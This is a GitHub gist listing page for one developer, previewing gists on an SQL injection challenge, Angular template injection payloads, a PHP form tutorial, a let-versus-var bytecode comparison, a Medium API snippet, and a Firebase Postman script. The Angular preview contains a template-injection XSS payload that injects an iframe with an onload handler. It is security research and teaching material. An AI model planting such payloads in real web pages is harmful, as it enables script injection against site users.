Skip to content

Instantly share code, notes, and snippets.

View aszx87410's full-sized avatar

Huli aszx87410

View GitHub Profile
@aszx87410
aszx87410 / sqlinjection.md
Last active January 11, 2022 13:45
SQL injection

SQL injection 小挑戰

說明

底下是兩個從實際案例修改而成的 SQL injection 小挑戰,很明顯有 SQL injection 的漏洞
要拿到 flag 不難,但我覺得有趣的是「要如何利用最少的 request,得到最多的資訊」
舉例來說,boolean based 一次只能拿到 true 或 false,資訊量就偏少
如果能直接 union 然後把結果 dump 出來,資訊量就大很多

因此這個挑戰的目的在於如何用最少的 request,得到最多的資訊量

@aszx87410
aszx87410 / AngularTI.md
Created August 18, 2021 07:43 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@aszx87410
aszx87410 / php_form_submit.md
Created October 5, 2020 15:11 — forked from jesperorb/php_form_submit.md
PHP form submitting with fetch + async/await

PHP Form submitting

If we have the following structure in our application:

  • 📁 application_folder_name
    • 📄 index.php
    • 📄 handle_form.php
    • 📄 main.js

And we fill our index.php with the following content just to get a basic website with a form working. You should be able to run this through a php-server of your choice.

@aszx87410
aszx87410 / README.md
Last active December 8, 2023 21:59
let vs var by investigating the bytecode generated by Node.js

It's the reply to the question raised by @getify on his twitter:

here's a variation on the question... will JS engines exhibit much performance difference between these two loops?

for (var i = 0; i < 100000000; i++) {
   // do some stuff, but not closure
}

for (let i = 0; i < 100000000; i++) {
@aszx87410
aszx87410 / mediumUsersFollowedByCount.js
Created June 30, 2019 21:32 — forked from newhouse/mediumUsersFollowedByCount.js
Medium API: get number of followers for User
/**
* Example of how to get the number of followers for a Medium.com User.
*
*
* Related links:
* https://github.com/Medium/medium-api-docs/issues/30#issuecomment-227911763
* https://github.com/Medium/medium-api-docs/issues/73
*/
// LODASH
@aszx87410
aszx87410 / isPrime.js
Created May 9, 2019 13:49
判斷質數錯誤範例
function isPrime(n) {
if (n === 1) return false;
for (let i = 2; i < n; i++) {
if (n % i === 0) {
return false;
} else {
return true;
}
}
}
@aszx87410
aszx87410 / lidemy.md
Created February 5, 2019 08:10
qa 回答

能分享自學成為後端工程師的案例經驗嗎?

雖然我自己的課程是前後端都有教,而且兩者的比重其實前端多一些而已,但不知道是不是因為我自己是前端工程師的關係,我的學生們都對前端比較有興趣一點,所以大多數出去以後都在找前端工程師的工作。

找後端的應該也是有但還沒有成功案例,如果你是問自學而不是我的學生的案例的話,我這邊沒有案例可以分享,可能要自己 google 找找了。

胡立大大,請問你覺得寫程式作為一份工作,什麼是支持你一直走下去的動力?

熱情吧,從小時候就知道對寫程式很有興趣,有了熱情就能夠做下去,做下去就會越來越進步越來越專業然後得到相對的報酬或是讚賞 有了讚賞跟報酬以後就會越有自信繼續走下去,大概就是這樣的一個正向循環

//.eslintrc
{
"env": {
"browser": true,
"es6": true,
"node": true,
"jest": true
},
"parser": "babel-eslint",
@aszx87410
aszx87410 / firebase_pre-request_script.js
Created January 10, 2018 09:31 — forked from moneal/firebase_pre-request_script.js
Postman pre-request script to create a Firebase authentication JWT header.
/**
* This script expects the global variables 'refresh_token' and 'firebase_api_key' to be set. 'firebase_api_key' can be found
* in the Firebase console under project settings then 'Web API Key'.
* 'refresh_token' as to be gathered from watching the network requests to https://securetoken.googleapis.com/v1/token from
* your Firebase app, look for the formdata values
*
* If all the data is found it makes a request to get a new token and sets a 'auth_jwt' environment variable and updates the
* global 'refresh_token'.
*
* Requests that need authentication should have a header with a key of 'Authentication' and value of '{{auth_jwt}}'
@aszx87410
aszx87410 / firebase_pre-request_script.js
Created January 10, 2018 09:31 — forked from moneal/firebase_pre-request_script.js
Postman pre-request script to create a Firebase authentication JWT header.
/**
* This script expects the global variables 'refresh_token' and 'firebase_api_key' to be set. 'firebase_api_key' can be found
* in the Firebase console under project settings then 'Web API Key'.
* 'refresh_token' as to be gathered from watching the network requests to https://securetoken.googleapis.com/v1/token from
* your Firebase app, look for the formdata values
*
* If all the data is found it makes a request to get a new token and sets a 'auth_jwt' environment variable and updates the
* global 'refresh_token'.
*
* Requests that need authentication should have a header with a key of 'Authentication' and value of '{{auth_jwt}}'